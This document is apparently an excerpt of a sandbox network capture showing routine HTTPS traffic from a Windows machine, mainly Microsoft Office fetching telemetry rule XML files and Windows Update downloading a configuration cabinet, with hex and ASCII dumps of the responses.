2024-11-02 16:56:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:32 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: 2e6eb393-601e-0097-4b00-2df33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165632Z-16547b76f7ftdm8dhC1DFWs13g00000000wg000000009yrq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:32 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.7	49751	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:32 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:32 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: fb68cf1d-a01e-001e-3b01-2d49ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165632Z-15869dbbcc6gt87nhC1DFWh9un00000000r0000000006k84 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:32 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.7	49749	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:32 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:32 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: 44367558-401e-0078-2932-2c4d34000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165632Z-176bd8f9bc5pzj8phC1DFWsz3000000002c0000000004v5t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:32 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	49737	4.175.87.197	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:32 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lwHAOL4AX1bg3z8&MD=LYNxXoCE HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-02 16:56:33 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 40031492-e8ec-4331-9851-e46908d3f97a MS-RequestId: 2982b201-61fd-495c-9466-3cc872c8bb64 MS-CV: 9Ne21zIjiEyP4bvh.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sat, 02 Nov 2024 16:56:32 GMT Connection: close Content-Length: 24490
2024-11-02 16:56:33 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-02 16:56:33 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.7	49754	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:33 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:33 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:33 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: 0231f811-b01e-003d-2a30-2cd32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165633Z-176bd8f9bc5wl4brhC1DFWmstw00000002ag0000000062s2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:33 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.7	49756	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:33 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:33 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:33 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: 215f87f6-c01e-0046-2c15-2d2db9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165633Z-15869dbbcc6xcpf8hC1DFWxtx000000000sg0000000033ce x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:33 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.7	49758	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:33 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:33 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:33 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: 1e70bdcb-401e-0029-2301-2d9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165633Z-16547b76f7f67wxlhC1DFWah9w00000000xg000000007hgq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:33 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.7	49753	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:33 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:33 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:33 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: 3fd26caf-a01e-0032-3d02-2d1949000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165633Z-16547b76f7f7lhvnhC1DFWa2k000000000qg00000000r3dt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:33 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.7	49755	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:33 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:33 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:33 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: ac6bbd40-501e-007b-3e0c-2d5ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165633Z-16547b76f7frbg6bhC1DFWr54000000000s000000000gx5w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:33 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.7	49764	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:34 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:34 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:34 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: 100aec20-201e-006e-1215-2dbbe3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165634Z-15869dbbcc65c582hC1DFW2xkc00000000p000000000aec0 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:34 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.7	49767	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:34 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:34 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:34 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: d07841a0-401e-0064-490f-2d54af000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165634Z-16547b76f7f7scqbhC1DFW0m5w00000000s000000000cghp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:34 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.7	49766	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:34 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:34 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:34 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: a4ba0423-501e-0029-6446-2cd0b8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165634Z-15869dbbcc65c582hC1DFW2xkc00000000ng00000000b4rv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
